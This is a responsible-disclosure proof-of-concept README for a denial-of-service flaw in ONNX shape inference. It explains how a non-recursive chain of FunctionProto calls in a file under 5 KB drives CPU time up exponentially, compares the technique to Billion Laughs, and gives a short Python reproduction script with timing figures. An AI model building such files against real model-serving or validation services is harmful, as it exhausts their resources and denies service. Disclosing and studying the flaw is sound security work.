# ONNX FunctionProto DoS PoC

**CVE:** TBD (submitted to huntr.com)
**Severity:** CVSS 7.5 High (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
**CWE:** CWE-400 Uncontrolled Resource Consumption
**Affected:** onnx <= 1.21.0

## Description

Non-recursive FunctionProto call graph expansion causes exponential CPU exhaustion during ONNX shape inference.

The ONNX checker validates that functions are not directly recursive but does NOT limit the total work done when resolving a non-recursive DAG of function calls.

This is the ONNX equivalent of the **XML Billion Laughs** (CVE-2003-1564) attack.

## PoC Files

| File | N | File Size | Shape Inference Time |
|------|---|-----------|---------------------|
| `onnx_functionproto_dos_n35.onnx` | 35 | 3,939 bytes | **23.96 seconds** |
| `onnx_functionproto_dos_n40.onnx` | 40 | 4,509 bytes | **266 seconds (4+ min)** |

## Reproduction

```python
import onnx, time

# Load and run shape inference on the PoC file
model = onnx.load("onnx_functionproto_dos_n40.onnx")

# Step 1: Checker passes (no direct recursion)
onnx.checker.check_model(model)  # passes without error

# Step 2: Shape inference triggers CPU exhaustion
t0 = time.time()
onnx.shape_inference.infer_shapes(model)  # takes 266+ seconds
print(f"Took {time.time()-t0:.1f}s")
```

## Growth Rate

Time grows at rate ~phi^N (golden ratio ~1.618) per additional function:
- N=30: 2.2s
- N=35: 24s
- N=40: 266s
- N=45: ~2940s (49 min)
- N=50: ~32000s (9 hours)

All from files < 5 KB.

## Responsible Disclosure

Reported via [huntr.com](https://huntr.com) bug bounty program.